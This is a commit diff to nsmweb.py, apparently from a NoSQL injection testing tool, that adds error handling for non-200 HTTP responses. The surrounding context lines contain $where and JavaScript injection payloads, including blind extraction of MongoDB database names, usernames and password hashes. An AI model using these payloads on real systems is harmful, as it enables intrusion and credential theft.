Commit 9bcf017

authored

Merge pull request #61 from andresriancho/master

Better error handling for web applications which respond with non-200...

2 parents 0c642e3 + 5dc778a commit 9bcf017Copy full SHA for 9bcf017

File tree

1 file changed

+59

-53

lines changed

nsmweb.py

1 file changed

+59

-53

lines changed

`‎nsmweb.py`

Lines changed: 59 additions & 53 deletions

Original file line number	Diff line number	Diff line change
`@@ -58,7 +58,7 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):`
`58`	`58`	`req = urllib2.Request(appURL, None, requestHeaders)`
`59`	`59`	`appRespCode = urllib2.urlopen(req).getcode()`
`60`	`60`	`if appRespCode == 200:`
`61`		`- normLength = int(len(urllib2.urlopen(req).read()))`
	`61`	`+ normLength = int(len(getResponseBodyHandlingErrors(req)))`
`62`	`62`	`timeReq = urllib2.urlopen(req)`
`63`	`63`	`start = time.time()`
`64`	`64`	`page = timeReq.read()`
`@@ -86,7 +86,6 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):`
`86`	`86`	`print "Using " + injectString + " for injection testing.\n"`
`87`	`87`
`88`	`88`	`# Build a random string and insert; if the app handles input correctly, a random string and injected code should be treated the same.`
`89`		`- # Add error handling for Non-200 HTTP response codes if random strings freaks out the app.`
`90`	`89`	`if "?" not in appURL:`
`91`	`90`	`print "No URI parameters provided for GET request...Check your options.\n"`
`92`	`91`	`raw_input("Press enter to continue...")`
`@@ -101,7 +100,9 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):`
`101`	`100`	`else:`
`102`	`101`	`print "Sending random parameter value..."`
`103`	`102`
`104`		`- randLength = int(len(urllib2.urlopen(req).read()))`
	`103`	`+ responseBody = getResponseBodyHandlingErrors(req)`
	`104`	`+ randLength = int(len(responseBody))`
	`105`	`+`
`105`	`106`	`print "Got response length of " + str(randLength) + "."`
`106`	`107`	`randNormDelta = abs(normLength - randLength)`
`107`	`108`
`@@ -117,10 +118,10 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):`
`117`	`118`
`118`	`119`	`# Test for errors returned by injection`
`119`	`120`	`req = urllib2.Request(uriArray[1], None, requestHeaders)`
`120`		`- errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)`
	`121`	`+ errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)`
`121`	`122`
`122`	`123`	`if errorCheck == False:`
`123`		`- injLen = int(len(urllib2.urlopen(req).read()))`
	`124`	`+ injLen = int(len(getResponseBodyHandlingErrors(req)))`
`124`	`125`	`checkResult(randLength,injLen,testNum,verb,None)`
`125`	`126`	`testNum += 1`
`126`	`127`	`else:`
`@@ -135,11 +136,11 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):`
`135`	`136`
`136`	`137`	`print uriArray[2]`
`137`	`138`	`req = urllib2.Request(uriArray[2], None, requestHeaders)`
`138`		`- errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)`
	`139`	`+ errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)`
`139`	`140`
`140`	`141`
`141`	`142`	`if errorCheck == False:`
`142`		`- injLen = int(len(urllib2.urlopen(req).read()))`
	`143`	`+ injLen = int(len(getResponseBodyHandlingErrors(req)))`
`143`	`144`	`checkResult(randLength,injLen,testNum,verb,None)`
`144`	`145`	`testNum += 1`
`145`	`146`
`@@ -154,11 +155,11 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):`
`154`	`155`	`print "Test 3: $where injection (integer escape)"`
`155`	`156`
`156`	`157`	`req = urllib2.Request(uriArray[3], None, requestHeaders)`
`157`		`- errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)`
	`158`	`+ errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)`
`158`	`159`
`159`	`160`
`160`	`161`	`if errorCheck == False:`
`161`		`- injLen = int(len(urllib2.urlopen(req).read()))`
	`162`	`+ injLen = int(len(getResponseBodyHandlingErrors(req)))`
`162`	`163`	`checkResult(randLength,injLen,testNum,verb,None)`
`163`	`164`	`testNum +=1`
`164`	`165`
`@@ -174,10 +175,10 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):`
`174`	`175`	`print "Test 4: $where injection string escape (single record)"`
`175`	`176`
`176`	`177`	`req = urllib2.Request(uriArray[4], None, requestHeaders)`
`177`		`- errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)`
	`178`	`+ errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)`
`178`	`179`
`179`	`180`	`if errorCheck == False:`
`180`		`- injLen = int(len(urllib2.urlopen(req).read()))`
	`181`	`+ injLen = int(len(getResponseBodyHandlingErrors(req)))`
`181`	`182`	`checkResult(randLength,injLen,testNum,verb,None)`
`182`	`183`	`testNum += 1`
`183`	`184`	`else:`
`@@ -191,10 +192,10 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):`
`191`	`192`	`print "Test 5: $where injection integer escape (single record)"`
`192`	`193`
`193`	`194`	`req = urllib2.Request(uriArray[5], None, requestHeaders)`
`194`		`- errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)`
	`195`	`+ errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)`
`195`	`196`
`196`	`197`	`if errorCheck == False:`
`197`		`- injLen = int(len(urllib2.urlopen(req).read()))`
	`198`	`+ injLen = int(len(getResponseBodyHandlingErrors(req)))`
`198`	`199`	`checkResult(randLength,injLen,testNum,verb,None)`
`199`	`200`	`testNum +=1`
`200`	`201`
`@@ -209,10 +210,10 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):`
`209`	`210`	`print "Test 6: This != injection (string escape)"`
`210`	`211`
`211`	`212`	`req = urllib2.Request(uriArray[6], None, requestHeaders)`
`212`		`- errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)`
	`213`	`+ errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)`
`213`	`214`
`214`	`215`	`if errorCheck == False:`
`215`		`- injLen = int(len(urllib2.urlopen(req).read()))`
	`216`	`+ injLen = int(len(getResponseBodyHandlingErrors(req)))`
`216`	`217`	`checkResult(randLength,injLen,testNum,verb,None)`
`217`	`218`	`testNum += 1`
`218`	`219`	`else:`
`@@ -226,10 +227,10 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):`
`226`	`227`	`print "Test 7: This != injection (integer escape)"`
`227`	`228`
`228`	`229`	`req = urllib2.Request(uriArray[7], None, requestHeaders)`
`229`		`- errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)`
	`230`	`+ errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)`
`230`	`231`
`231`	`232`	`if errorCheck == False:`
`232`		`- injLen = int(len(urllib2.urlopen(req).read()))`
	`233`	`+ injLen = int(len(getResponseBodyHandlingErrors(req)))`
`233`	`234`	`checkResult(randLength,injLen,testNum,verb,None)`
`234`	`235`	`testNum += 1`
`235`	`236`	`else:`
`@@ -244,10 +245,10 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):`
`244`	`245`	`print "Test 8: PHP/ExpressJS > Undefined Injection"`
`245`	`246`
`246`	`247`	`req = urllib2.Request(uriArray[8], None, requestHeaders)`
`247`		`- errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)`
	`248`	`+ errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)`
`248`	`249`
`249`	`250`	`if errorCheck == False:`
`250`		`- injLen = int(len(urllib2.urlopen(req).read()))`
	`251`	`+ injLen = int(len(getResponseBodyHandlingErrors(req)))`
`251`	`252`	`checkResult(randLength,injLen,testNum,verb,None)`
`252`	`253`	`testNum += 1`
`253`	`254`
`@@ -258,10 +259,8 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):`
`258`	`259`	`print "Starting Javascript string escape time based injection..."`
`259`	`260`	`req = urllib2.Request(uriArray[18], None, requestHeaders)`
`260`	`261`	`start = time.time()`
`261`		`- strTimeInj = urllib2.urlopen(req)`
`262`		`- page = strTimeInj.read()`
	`262`	`+ page = getResponseBodyHandlingErrors(req)`
`263`	`263`	`end = time.time()`
`264`		`- strTimeInj.close()`
`265`	`264`	`#print str(end)`
`266`	`265`	`#print str(start)`
`267`	`266`	`strTimeDelta = (int(round((end - start), 3)) - timeBase)`
`@@ -277,10 +276,8 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):`
`277`	`276`	`print "Starting Javascript integer escape time based injection..."`
`278`	`277`	`req = urllib2.Request(uriArray[9], None, requestHeaders)`
`279`	`278`	`start = time.time()`
`280`		`- intTimeInj = urllib2.urlopen(req)`
`281`		`- page = intTimeInj.read()`
	`279`	`+ page = getResponseBodyHandlingErrors(req)`
`282`	`280`	`end = time.time()`
`283`		`- intTimeInj.close()`
`284`	`281`	`#print str(end)`
`285`	`282`	`#print str(start)`
`286`	`283`	`intTimeDelta = (int(round((end - start), 3)) - timeBase)`
`@@ -348,6 +345,15 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):`
`348`	`345`	`return()`
`349`	`346`
`350`	`347`
	`348`	`+def getResponseBodyHandlingErrors(req):`
	`349`	`+ try:`
	`350`	`+ responseBody = urllib2.urlopen(req).read()`
	`351`	`+ except urllib2.HTTPError, err:`
	`352`	`+ responseBody = err.read()`
	`353`	`+`
	`354`	`+ return responseBody`
	`355`	`+`
	`356`	`+`
`351`	`357`	`def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):`
`352`	`358`	`print "Web App Attacks (POST)"`
`353`	`359`	`print "==============="`
`@@ -386,7 +392,7 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):`
`386`	`392`
`387`	`393`	`if appRespCode == 200:`
`388`	`394`
`389`		`- normLength = int(len(urllib2.urlopen(req).read()))`
	`395`	`+ normLength = int(len(getResponseBodyHandlingErrors(req)))`
`390`	`396`	`timeReq = urllib2.urlopen(req)`
`391`	`397`	`start = time.time()`
`392`	`398`	`page = timeReq.read()`
`@@ -438,7 +444,7 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):`
`438`	`444`
`439`	`445`	`body = urllib.urlencode(postData)`
`440`	`446`	`req = urllib2.Request(appURL,body, requestHeaders)`
`441`		`- randLength = int(len(urllib2.urlopen(req).read()))`
	`447`	`+ randLength = int(len(getResponseBodyHandlingErrors(req)))`
`442`	`448`	`print "Got response length of " + str(randLength) + "."`
`443`	`449`
`444`	`450`	`randNormDelta = abs(normLength - randLength)`
`@@ -460,10 +466,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):`
`460`	`466`	`else:`
`461`	`467`	`print "Test 1: PHP/ExpressJS != associative array injection"`
`462`	`468`
`463`		`- errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)`
	`469`	`+ errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)`
`464`	`470`
`465`	`471`	`if errorCheck == False:`
`466`		`- injLen = int(len(urllib2.urlopen(req).read()))`
	`472`	`+ injLen = int(len(getResponseBodyHandlingErrors(req)))`
`467`	`473`	`checkResult(randLength,injLen,testNum,verb,postData)`
`468`	`474`	`testNum += 1`
`469`	`475`
`@@ -487,10 +493,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):`
`487`	`493`	`else:`
`488`	`494`	`print "Test 2: PHP/ExpressJS > Undefined Injection"`
`489`	`495`
`490`		`- errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)`
	`496`	`+ errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)`
`491`	`497`
`492`	`498`	`if errorCheck == False:`
`493`		`- injLen = int(len(urllib2.urlopen(req).read()))`
	`499`	`+ injLen = int(len(getResponseBodyHandlingErrors(req)))`
`494`	`500`	`checkResult(randLength,injLen,testNum,verb,postData)`
`495`	`501`	`testNum += 1`
`496`	`502`
`@@ -504,10 +510,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):`
`504`	`510`	`else:`
`505`	`511`	`print "Test 3: $where injection (string escape)"`
`506`	`512`
`507`		`- errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)`
	`513`	`+ errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)`
`508`	`514`
`509`	`515`	`if errorCheck == False:`
`510`		`- injLen = int(len(urllib2.urlopen(req).read()))`
	`516`	`+ injLen = int(len(getResponseBodyHandlingErrors(req)))`
`511`	`517`	`checkResult(randLength,injLen,testNum,verb,postData)`
`512`	`518`	`testNum += 1`
`513`	`519`	`else:`
`@@ -524,10 +530,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):`
`524`	`530`	`else:`
`525`	`531`	`print "Test 4: $where injection (integer escape)"`
`526`	`532`
`527`		`- errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)`
	`533`	`+ errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)`
`528`	`534`
`529`	`535`	`if errorCheck == False:`
`530`		`- injLen = int(len(urllib2.urlopen(req).read()))`
	`536`	`+ injLen = int(len(getResponseBodyHandlingErrors(req)))`
`531`	`537`	`checkResult(randLength,injLen,testNum,verb,postData)`
`532`	`538`	`testNum += 1`
`533`	`539`	`else:`
`@@ -545,10 +551,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):`
`545`	`551`	`else:`
`546`	`552`	`print "Test 5: $where injection string escape (single record)"`
`547`	`553`
`548`		`- errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)`
	`554`	`+ errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)`
`549`	`555`
`550`	`556`	`if errorCheck == False:`
`551`		`- injLen = int(len(urllib2.urlopen(req).read()))`
	`557`	`+ injLen = int(len(getResponseBodyHandlingErrors(req)))`
`552`	`558`	`checkResult(randLength,injLen,testNum,verb,postData)`
`553`	`559`	`testNum += 1`
`554`	`560`
`@@ -566,10 +572,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):`
`566`	`572`	`else:`
`567`	`573`	`print "Test 6: $where injection integer escape (single record)"`
`568`	`574`
`569`		`- errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)`
	`575`	`+ errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)`
`570`	`576`
`571`	`577`	`if errorCheck == False:`
`572`		`- injLen = int(len(urllib2.urlopen(req).read()))`
	`578`	`+ injLen = int(len(getResponseBodyHandlingErrors(req)))`
`573`	`579`	`checkResult(randLength,injLen,testNum,verb,postData)`
`574`	`580`	`testNum += 1`
`575`	`581`
`@@ -588,10 +594,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):`
`588`	`594`	`else:`
`589`	`595`	`print "Test 7: This != injection (string escape)"`
`590`	`596`
`591`		`- errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)`
	`597`	`+ errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)`
`592`	`598`
`593`	`599`	`if errorCheck == False:`
`594`		`- injLen = int(len(urllib2.urlopen(req).read()))`
	`600`	`+ injLen = int(len(getResponseBodyHandlingErrors(req)))`
`595`	`601`	`checkResult(randLength,injLen,testNum,verb,postData)`
`596`	`602`	`testNum += 1`
`597`	`603`	`print "\n"`
`@@ -608,10 +614,10 @@ def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):`
`608`	`614`	`else:`
`609`	`615`	`print "Test 8: This != injection (integer escape)"`
`610`	`616`
`611`		`- errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)`
	`617`	`+ errorCheck = errorTest(getResponseBodyHandlingErrors(req),testNum)`
`612`	`618`
`613`	`619`	`if errorCheck == False:`
`614`		`- injLen = int(len(urllib2.urlopen(req).read()))`
	`620`	`+ injLen = int(len(getResponseBodyHandlingErrors(req)))`
`615`	`621`	`checkResult(randLength,injLen,testNum,verb,postData)`
`616`	`622`	`testNum += 1`
`617`	`623`
`@@ -974,7 +980,7 @@ def getDBInfo():`
`974`	`980`	`trueUri = uriArray[16].replace("---","return true; var dummy ='!" + "&")`
`975`	`981`	`#print "Debug " + str(trueUri)`
`976`	`982`	`req = urllib2.Request(trueUri, None, requestHeaders)`
`977`		`- baseLen = int(len(urllib2.urlopen(req).read()))`
	`983`	`+ baseLen = int(len(getResponseBodyHandlingErrors(req)))`
`978`	`984`	`print "Got baseline true query length of " + str(baseLen)`
`979`	`985`
`980`	`986`	`print "Calculating DB name length..."`
`@@ -983,7 +989,7 @@ def getDBInfo():`
`983`	`989`	`calcUri = uriArray[16].replace("---","var curdb = db.getName(); if (curdb.length ==" + str(curLen) + ") {return true;} var dum='a" + "&")`
`984`	`990`	`#print "Debug: " + calcUri`
`985`	`991`	`req = urllib2.Request(calcUri, None, requestHeaders)`
`986`		`- lenUri = int(len(urllib2.urlopen(req).read()))`
	`992`	`+ lenUri = int(len(getResponseBodyHandlingErrors(req)))`
`987`	`993`	`#print "Debug length: " + str(lenUri)`
`988`	`994`
`989`	`995`	`if lenUri == baseLen:`
`@@ -998,7 +1004,7 @@ def getDBInfo():`
`998`	`1004`	`charUri = uriArray[16].replace("---","var curdb = db.getName(); if (curdb.charAt(" + str(nameCounter) + ") == '"+ chars[charCounter] + "') { return true; } var dum='a" + "&")`
`999`	`1005`
`1000`	`1006`	`req = urllib2.Request(charUri, None, requestHeaders)`
`1001`		`- lenUri = int(len(urllib2.urlopen(req).read()))`
	`1007`	`+ lenUri = int(len(getResponseBodyHandlingErrors(req)))`
`1002`	`1008`
`1003`	`1009`	`if lenUri == baseLen:`
`1004`	`1010`	`dbName = dbName + chars[charCounter]`
`@@ -1024,7 +1030,7 @@ def getDBInfo():`
`1024`	`1030`	`usrCntUri = uriArray[16].replace("---","var usrcnt = db.system.users.count(); if (usrcnt == " + str(usrCount) + ") { return true; } var dum='a")`
`1025`	`1031`
`1026`	`1032`	`req = urllib2.Request(usrCntUri, None, requestHeaders)`
`1027`		`- lenUri = int(len(urllib2.urlopen(req).read()))`
	`1033`	`+ lenUri = int(len(getResponseBodyHandlingErrors(req)))`
`1028`	`1034`
`1029`	`1035`	`if lenUri == baseLen:`
`1030`	`1036`	`print "Found " + str(usrCount) + " user(s)."`
`@@ -1050,7 +1056,7 @@ def getDBInfo():`
`1050`	`1056`	`usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.user.length == " + str(usrChars) + ") { return true; } var dum='a" + "&")`
`1051`	`1057`
`1052`	`1058`	`req = urllib2.Request(usrUri, None, requestHeaders)`
`1053`		`- lenUri = int(len(urllib2.urlopen(req).read()))`
	`1059`	`+ lenUri = int(len(getResponseBodyHandlingErrors(req)))`
`1054`	`1060`
`1055`	`1061`	`if lenUri == baseLen:`
`1056`	`1062`	`# Got the right number of characters`
`@@ -1063,7 +1069,7 @@ def getDBInfo():`
`1063`	`1069`	`usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.user.charAt(" + str(rightCharsUsr) + ") == '"+ chars[charCounterUsr] + "') { return true; } var dum='a" + "&")`
`1064`	`1070`
`1065`	`1071`	`req = urllib2.Request(usrUri, None, requestHeaders)`
`1066`		`- lenUri = int(len(urllib2.urlopen(req).read()))`
	`1072`	`+ lenUri = int(len(getResponseBodyHandlingErrors(req)))`
`1067`	`1073`
`1068`	`1074`	`if lenUri == baseLen:`
`1069`	`1075`	`username = username + chars[charCounterUsr]`
`@@ -1088,7 +1094,7 @@ def getDBInfo():`
`1088`	`1094`	`hashUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.pwd.charAt(" + str(rightCharsHash) + ") == '"+ chars[charCounterHash] + "') { return true; } var dum='a" + "&")`
`1089`	`1095`
`1090`	`1096`	`req = urllib2.Request(hashUri, None, requestHeaders)`
`1091`		`- lenUri = int(len(urllib2.urlopen(req).read()))`
	`1097`	`+ lenUri = int(len(getResponseBodyHandlingErrors(req)))`
`1092`	`1098`
`1093`	`1099`	`if lenUri == baseLen:`
`1094`	`1100`	`pwdHash = pwdHash + chars[charCounterHash]`
`@@ -1111,7 +1117,7 @@ def getDBInfo():`
`1111`	`1117`	`usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.user.length == " + str(usrChars) + ") { return true; } var dum='a" + "&")`
`1112`	`1118`
`1113`	`1119`	`req = urllib2.Request(usrUri, None, requestHeaders)`
`1114`		`- lenUri = int(len(urllib2.urlopen(req).read()))`
	`1120`	`+ lenUri = int(len(getResponseBodyHandlingErrors(req)))`
`1115`	`1121`
`1116`	`1122`	`if lenUri == baseLen:`
`1117`	`1123`	`# Got the right number of characters`
`@@ -1124,7 +1130,7 @@ def getDBInfo():`
`1124`	`1130`	`usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.user.charAt(" + str(rightCharsUsr) + ") == '"+ chars[charCounterUsr] + "') { return true; } var dum='a" + "&")`
`1125`	`1131`
`1126`	`1132`	`req = urllib2.Request(usrUri, None, requestHeaders)`
`1127`		`- lenUri = int(len(urllib2.urlopen(req).read()))`
	`1133`	`+ lenUri = int(len(getResponseBodyHandlingErrors(req)))`
`1128`	`1134`
`1129`	`1135`	`if lenUri == baseLen:`
`1130`	`1136`	`username = username + chars[charCounterUsr]`
`@@ -1146,7 +1152,7 @@ def getDBInfo():`
`1146`	`1152`	`hashUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.pwd.charAt(" + str(rightCharsHash) + ") == '"+ chars[charCounterHash] + "') { return true; } vardum='a" + "&")`
`1147`	`1153`
`1148`	`1154`	`req = urllib2.Request(hashUri, None, requestHeaders)`
`1149`		`- lenUri = int(len(urllib2.urlopen(req).read()))`
	`1155`	`+ lenUri = int(len(getResponseBodyHandlingErrors(req)))`
`1150`	`1156`
`1151`	`1157`	`if lenUri == baseLen:`
`1152`	`1158`	`pwdHash = pwdHash + chars[charCounterHash]`

0 commit comments

Comments

(0)

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Uh oh!

Commit 9bcf017

File tree

1 file changed

1 file changed

`‎nsmweb.py`

0 commit comments